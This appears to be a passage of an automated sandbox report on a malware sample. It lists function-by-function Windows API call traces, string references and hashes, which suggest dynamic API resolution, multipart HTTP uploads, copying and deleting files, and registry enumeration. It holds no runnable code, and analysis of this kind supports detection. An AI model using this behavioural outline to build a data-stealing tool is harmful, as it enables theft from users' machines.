libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00CE2B68), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,00CE29E8), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,00CE2970), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,00CE2A48), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,00CE2910), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,00CC5F80), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,00CC43D8), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,00CC4258), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,00CE2988), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,00CE2AF0), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,00CE2AD8), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,00CE2B38), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,00CC4338), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,00CE2AA8), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,00CE2B08), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,00CC4498), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,00CE2A60), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,00CE2A00), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,00CC4318), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,00CE2AC0), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,00CC40B8), ref: 004160F8
LoadLibraryA.KERNEL32(00CE2A30,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(00CE2B20,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(00CE2880,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(00CE2898,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(00CE2928,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,00CE2958), ref: 00416172
GetProcAddress.KERNEL32(75290000,00CE28C8), ref: 00416193
GetProcAddress.KERNEL32(75290000,00CE28B0), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,00CE28E0), ref: 004161CD
GetProcAddress.KERNEL32(75450000,00CC43F8), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,00CC5F90), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,00CE2FA8,?,00CE7D18,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00CE2E98,00000000,?,00CE7320,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 00404F4B
------, xrefs: 0040506B
------, xrefs: 004051AD
", xrefs: 00405278
", xrefs: 004053BA
", xrefs: 00405136
------, xrefs: 004052EF
--, xrefs: 00404F34

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1133489818-2774362122
Opcode ID: 5fa911a384c99628326e0f6a8169568e2593494a8d2524937c23eba450caeaff
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 5fa911a384c99628326e0f6a8169568e2593494a8d2524937c23eba450caeaff
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,00CE3038), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,00CE2F58,00000000,?,00CE7320,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,00CE2FA8,?,00CE7D18,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

", xrefs: 00405AC6
------, xrefs: 004059FC
------, xrefs: 00405746
-A, xrefs: 00405620, 00405D27, 00405623
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
", xrefs: 00405985
------, xrefs: 004058BB

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A
API String ID: 148854478-602752961
Opcode ID: a06a0ef50bb49ec889713ec628fdf17d3783216677d2ed17dae015157e4d4844
Instruction ID: 377e55510423cae5e1baecfaaf48a7e94fc4777266d7e3ad1c04213ead2a1c79
Opcode Fuzzy Hash: a06a0ef50bb49ec889713ec628fdf17d3783216677d2ed17dae015157e4d4844
Instruction Fuzzy Hash: 4D125075920218AACB14EBA1DC95FDEB739BF54304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 074fa1751cfd78859a97ba24e6b6d9a847c42831e4e7cc3fc2cdfe5d6295050f
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 074fa1751cfd78859a97ba24e6b6d9a847c42831e4e7cc3fc2cdfe5d6295050f
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,00CE7350,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: c59157317f8e99c0041e31fe7f3f9c0b7a69eba778b40b381f5f9144f0e8b48b
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: c59157317f8e99c0041e31fe7f3f9c0b7a69eba778b40b381f5f9144f0e8b48b
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,00CE3038), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,00CE3048), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,00CE2FA8,?,00CE7D18,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

", xrefs: 004048B2
------, xrefs: 0040467D
------, xrefs: 00404929
------, xrefs: 004047E8
", xrefs: 004049F3

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: d8169fbdebf6f44b35d600c3ca714c4a4a653d63cc1b0ed18c0c7d3f924ca16c
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: d8169fbdebf6f44b35d600c3ca714c4a4a653d63cc1b0ed18c0c7d3f924ca16c
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,00CE3488,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

- , xrefs: 00414D40
?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: a482ae4958be6604d46ded6f8d2d4dcb7199e5c860e6519b46e888b108f353ed
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: a482ae4958be6604d46ded6f8d2d4dcb7199e5c860e6519b46e888b108f353ed
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,00CC5FA0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,00CE7350,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
